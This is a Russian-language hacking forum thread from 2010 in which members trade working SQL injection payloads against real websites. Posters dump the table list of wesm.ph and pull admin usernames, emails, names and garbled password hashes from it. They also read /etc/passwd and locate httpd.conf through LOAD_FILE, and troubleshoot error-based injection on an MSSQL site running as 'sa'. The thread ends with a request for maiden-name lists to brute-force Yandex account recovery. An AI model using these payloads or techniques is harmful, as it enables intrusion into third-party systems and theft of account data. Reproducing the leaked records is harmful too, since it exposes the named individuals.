Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    либо таблицы users не существует, либо в ней нет выборки
     
  2. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    да не) вроде сущевствует)
    и вней есть такие колонки как login, Ppassword
    хм...
     
  3. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    ой, совсем забыл, что колонки вытаскивали из нее. значит выборки нет, такое бывает
     
  4. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    limit меняй, если в этом случае не выдаст тогда у тя нет прав на эту табличку
    либо данных нету но это вряд ли всетаки users жееее
     
  5. B0o0M

    B0o0M Member

    Joined:
    3 Aug 2009
    Messages:
    102
    Likes Received:
    8
    Reputations:
    1
    Итак есть иньекция в 5 версии мускула
    http://www.wesm.ph/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a) FROM INFORMATION_SCHEMA.TABLES
    имена таблиц выводит, используем limit тоесть
    http://www.wesm.ph/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a) FROM INFORMATION_SCHEMA.TABLES+limit+1,1 итд
    Дальше хочется узнать в каких таблицах какие колонки вот список всех таблиц

    CHARACTER_SETS - 0
    COLLATIONS - 1
    COLLATION_CHARACTER_SET_APPLICABILITY - 2
    COLUMNS - 3
    COLUMN_PRIVILEGES - 4
    KEY_COLUMN_USAGE - 5
    PROFILING - 6
    ROUTINES - 7
    SCHEMATA - 8
    SCHEMA_PRIVILEGES - 9
    STATISTICS - 10
    TABLES - 11
    TABLE_CONSTRAINTS - 12
    TABLE_PRIVILEGES - 13
    TRIGGERS - 14
    USER_PRIVILEGES - 15
    VIEWS - 16
    phpdig_clicks - 17
    phpdig_engine - 18
    phpdig_excludes - 19
    phpdig_includes - 20
    phpdig_keywords - 21
    phpdig_logs - 22
    phpdig_site_page - 23
    phpdig_sites - 24
    phpdig_spider - 25
    phpdig_tempspider - 26
    tbl_administered_price_workflow - 27
    tbl_ex_ante_ex_post_workflow - 28
    tbl_marginal_plants_workflow - 29
    tbl_mrr_workflow - 30
    tbl_projection - 31
    tbl_rtd_e_workflow - 32
    tbl_rtd_o_workflow - 33
    tbl_rtx_e_workflow - 34
    tbl_rtx_o_workflow - 35
    tbl_vsaa_rtd_e_workflow - 36
    tbl_vsaa_rtd_o_workflow - 37
    tbl_wap_e_workflow - 38
    tbl_wap_o_workflow - 39
    tbladmin_links - 40
    tbladmin_userlevel_links - 41
    tbladmin_userlevels - 42
    tbladmin_users - 43
    tblannouncement - 44
    tblannouncement_logs - 45
    tblapproval - 46
    tblcalendar_categories - 47
    tblcalendar_events - 48
    tblcategory - 49
    tblcomments - 50
    tblconfig - 51
    tblcountry - 52
    tbldailymarketupdate - 53
    tbldailymarketupdate_download - 54
    tbldata_graph - 55
    tbldepartment - 56
    tbldepartment_admin_users - 57
    tbldepartment_bak - 58
    tbldept_pages - 59
    tbldocument - 60
    tbldocument_download - 61
    tbldocument_logs - 62
    tbldownloads - 63
    tbldownloads_logs - 64
    tbleventcat - 65
    tbleventcodes - 66
    tblevents - 67
    tbleventspeakers - 68
    tblgovcalendar_categories - 69
    tblgovcalendar_meetings - 70
    tblgraph_html - 71
    tblimghead - 72
    tbllayouts - 73
    tbllogs - 74
    tblmag_dmi - 75
    tblmag_dmi_logs - 76
    tblmag_mmi - 77
    tblmag_mmi_logs - 78
    tblmag_wmi - 79
    tblmag_wmi_logs - 80
    tblmarket_monitoring_and_assessment - 81
    tblmarketindex - 82
    tblmarketindex_logs - 83
    tblmaster_topics - 84
    tblmaster_workflow - 85
    tblmembership - 86
    tblmessage - 87
    tblmessage_copy - 88
    tblmonthlysummary_report - 89
    tblmustrununit_reports - 90
    tblnews - 91
    tblnews_logs - 92
    tblnewsletter - 93
    tblp_wk_opd - 94
    tblp_wk_opd_logs - 95
    tblpages - 96
    tblparticipant - 97
    tblpostdispatch_report - 98
    tblprevweekreport_luzon - 99
    tblprivileges - 100
    tblrandom_page_side_messages - 101
    tblref_workflow - 102
    tblsub_workflow - 103
    tblsubscribers - 104
    tblsubscribers_topics - 105
    tbltype_privilege - 106
    tbluser_type - 107
    tbluser_type_admin_users - 108
    columns_priv - 109
    db - 110
    func - 111
    help_category - 112
    help_keyword - 113
    help_relation - 114
    help_topic - 115
    host - 116
    proc - 117
    procs_priv - 118
    tables_priv - 119
    time_zone - 120
    time_zone_leap_second - 121
    time_zone_name - 122
    time_zone_transition - 123
    time_zone_transition_type - 124
    user - 125
    wesm_forum_acl_groups - 126
    wesm_forum_acl_options - 127
    wesm_forum_acl_roles - 128
    wesm_forum_acl_roles_data - 129
    wesm_forum_acl_users - 130
    wesm_forum_attachments - 131
    wesm_forum_banlist - 132
    wesm_forum_bbcodes - 133
    wesm_forum_bookmarks - 134
    wesm_forum_bots - 135
    wesm_forum_config - 136
    wesm_forum_confirm - 137
    wesm_forum_disallow - 138
    wesm_forum_drafts - 139
    wesm_forum_extension_groups - 140
    wesm_forum_extensions - 141
    wesm_forum_forums - 142
    wesm_forum_forums_access - 143
    wesm_forum_forums_track - 144
    wesm_forum_forums_watch - 145
    wesm_forum_groups - 146
    wesm_forum_icons - 147
    wesm_forum_lang - 148
    wesm_forum_log - 149
    wesm_forum_moderator_cache - 150
    wesm_forum_modules - 151
    wesm_forum_poll_options - 152
    wesm_forum_poll_votes - 153
    wesm_forum_posts - 154
    wesm_forum_privmsgs - 155
    wesm_forum_privmsgs_folder - 156
    wesm_forum_privmsgs_rules - 157
    wesm_forum_privmsgs_to - 158
    wesm_forum_profile_fields - 159
    wesm_forum_profile_fields_data - 160
    wesm_forum_profile_fields_lang - 161
    wesm_forum_profile_lang - 162
    wesm_forum_ranks - 163
    wesm_forum_reports - 164
    wesm_forum_reports_reasons - 165
    wesm_forum_search_results - 166
    wesm_forum_search_wordlist - 167
    wesm_forum_search_wordmatch - 168
    wesm_forum_sessions - 169
    wesm_forum_sessions_keys - 170
    wesm_forum_sitelist - 171
    wesm_forum_smilies - 172
    wesm_forum_styles - 173
    wesm_forum_styles_imageset - 174
    wesm_forum_styles_imageset_data - 175
    wesm_forum_styles_template - 176
    wesm_forum_styles_template_data - 177
    wesm_forum_styles_theme - 178
    wesm_forum_topics - 179
    wesm_forum_topics_posted - 180
    wesm_forum_topics_track - 181
    wesm_forum_topics_watch - 182
    wesm_forum_user_group - 183
    wesm_forum_users - 184
    wesm_forum_warnings - 185
    wesm_forum_words - 186
    wesm_forum_zebra - 187
    Я использовал вот такой запрос
    http://www.wesm.ph/page.php?p=-7+union+select+COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char%2839,116,98,108,97,100,109,105,110,95,117,115,101,114,115,39%29
    Но он не прокатил, вапрос как мне вывести все столбцы таблицы,
    и вот еще иногда limit не проходит, какая есть ему альтернатива ???
    Заранее спсб
     
    1 person likes this.
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    concat_ws(0x3a,table_schema,table_name,column_name)+from+information_schema.columns+limit+x,1
     
    1 person likes this.
  7. B0o0M

    B0o0M Member

    Joined:
    3 Aug 2009
    Messages:
    102
    Likes Received:
    8
    Reputations:
    1
    это как я понял имя таблицы + имя колонки, а есть ли какойнить другой спосб
    + с меня
    ЗЫ
    http://www.wesm.ph/page.php?p=-7+union+select+CONCAT%280x3a,username,0x3a,password,0x3a%29+FROM+phpdig_sites/*
    выводит ошибку, а иногда вместо пароля каркозябры, мыло и юзернейм отображаюццо, как сделать чтобы пасс отображался норм
    вот пример
    http://www.wesm.ph/page.php?p=-7+union+select+CONCAT%280x3a,username,0x3a,psword,0x3a,email,0x3a%29+FROM+tbladmin_users+limit+4,4/*
     
    #12907 B0o0M, 12 May 2010
    Last edited: 12 May 2010
  8. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Делаешь запрос
    HTML:
    -1+union+select+group_concat(table_name)+from+information_schema.tables+where+table_schema!='information_schema'
    потом смотришь какая таблица последняя и делаешь запрос
    HTML:
    -1+union+select+group_concat(table_name)+from+information_schema.tables+where+table_schema!='information_schema'+and+table_name>'здесь имя последней таблицы, которая вывелась в первом запросе'
    и так постепенно выводишь все таблицы, тоже самое с колонками
     
    #12908 h00lyshit!, 12 May 2010
    Last edited: 23 May 2010
  9. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,180
    Likes Received:
    617
    Reputations:
    690
    2B0o0M
    тут как бэ классическая скуля
    Code:
    http://www.wesm.ph/page.php?p=-7+union+select+concat_ws(0x3a,psword,email,lastlogin)+from+tbladmin_users--+
    дальше лимитом но пароли думаю зашифрованы, по моему тут не поможет и convert() , unhex(hex()), AES_DECRYPT(AES_ENCRYPT()) ..... мое имхо.
    Code:
    psword:email:fname:lname:lastlogin:
    ����@=N��+:[email protected]:Amador:Mangosing:2010-05-12 19:44:44:
    �C0lH�2:[email protected]:Antonio:Arana:2010-05-12 05:38:12:
    pu=:[email protected]:Arnel:Almaden:2009-06-29 16:12:24:
    E[�{L:[email protected]:Arvin:Atal:2010-04-27 19:46:56:
    pu=:[email protected]:Approver:Bsd:2008-07-08 14:13:37:
    pu=:[email protected]:Approver:Imd:2008-07-08 14:13:47:
    MW8b:[email protected]:Approver:Opd:2009-07-09 16:44:09:
    
    /etc/passwd = 0x2f6574632f706173737764
    Code:
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    rpm:x:37:37::/var/lib/rpm:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    avahi:x:70:70:Avahi daemon:/:/sbin/nologin
    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    apache:x:48:48:Apache:/var/www:/sbin/nologin
    nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
    xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
    gdm:x:42:42::/var/gdm:/sbin/nologin
    sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
    wesm:x:502:100:wesm:/home/wesm:/bin/bash
    slingshot:x:501:100::/home/slingshot:/bin/bash
    badz:x:0:0::/home/badz:/bin/bash
    squid:x:23:23::/var/spool/squid:/sbin/nologin
    webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin
    postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
    desktop:x:80:80:desktop:/var/lib/menu/kde:/sbin/nologin
    postfix:x:89:89::/var/spool/postfix:/sbin/nologin
    pvm:x:24:24::/usr/share/pvm3:/bin/bash
    aylanan:x:505:100::/var/www/html/files:/bin/bash
    rapanosan:x:506:100::/var/www/html/files:/bin/bash
    mag:x:6700:100::/var/www/html/scripts/cron/done:/bin/bash
    wesm_opr:x:6701:2501::/var/www/html/cop.DwnLds/opd_temp:/bin/bash
    edbrinas:x:500:48::/home/edbrinas:/bin/bash
    users:x:100:48::/home/users:/bin/sh
    opd:x:6702:6702:Operations Planning Department:/var/www/html/pricetrigger:/bin/bash
    
    найденные конфиги
    /etc/httpd/conf/httpd.conf путь до апача
    Code:
    http://www.wesm.ph/page.php?p=7+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F6574632F68747470642F636F6E662F68747470642E636F6E66),0x7873716C696E6A656E64),0x71),0x71)+LIMIT+1,1/*
    /etc/php.ini php.ini
    /etc/my.cnf

    P.S Дальше думаю не трудно )
     
    _________________________
    #12909 shell_c0de, 13 May 2010
    Last edited: 13 May 2010
    2 people like this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ребят есть скул на сайте и есть форум phpbb,но форум на другой базе...
    как можно узнать имя базы если mysql четвертая ветка?
     
    _________________________
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    нигде, только брут
     
  12. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Если phpbb 2ая ветка,то там в каких-то версиях можно было в раскрытии путей узнать название базы или что-то в этом духе.
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    уже узнали спасибо
     
    _________________________
  14. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    Значит есть один уязвимый веб ресурс 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' . нашёл значит уязвимый скрипт ,вывел версию :admin/complaintHandler.asp?id=1+or+1=@@version
    Имя Базы Данных текущего юзера: admin/complaintHandler.asp?id=1%20or%201=(select%20db_name())
    Имя юзера владельца данной базой: admin/complaintHandler.asp?id=1%20or%201=(select%20system_user)-- = 'sa'

    Вроде всё окей и всё выводится , но вот когда создаю запрос :
    admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- то в ответ получаю Record not found: 1 or 1=1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--

    Зато когда создаю запрос : admin/complaintHandler.asp?id=1+or+1=(SELECT+TOP+1+column_NAME+FROM+INFORMATION_SCHEMA.columnS)-- колонки выводятся на ура !

    Кто знает почему table_name не выводятся а с column_name всё впорядке ??
     
  15. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    может это лишнее?
    admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
     
  16. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5

    При запросе: admin/complaintHandler.asp?id=1 (SELECT+%20TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- получаю Microsoft OLE DB Provider for SQL Server error '80040e14'

    sp_cursoropen/sp_cursorprepare: The statement parameter can only be a single select or a single stored procedure.
     
  17. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    на этот раз ты убрал слишком много.
    я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
     
  18. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5

    Record not found: 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--


    :(((
     
  19. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    =convert(int,(SELECT TOP 1 cast(name as nvarchar(4000))%2bchar(126) FROM (database)..sysobjects WHERE xtype=char(85)))--
     
  20. ReckouNT

    ReckouNT New Member

    Joined:
    16 Jan 2009
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Народ, есть ли у кого база фамилий в женском склонении для брута? (Девичья фамилия матери)
    Возможно ли побрутить яндекс этими фамилиями?
     
Thread Status:
Not open for further replies.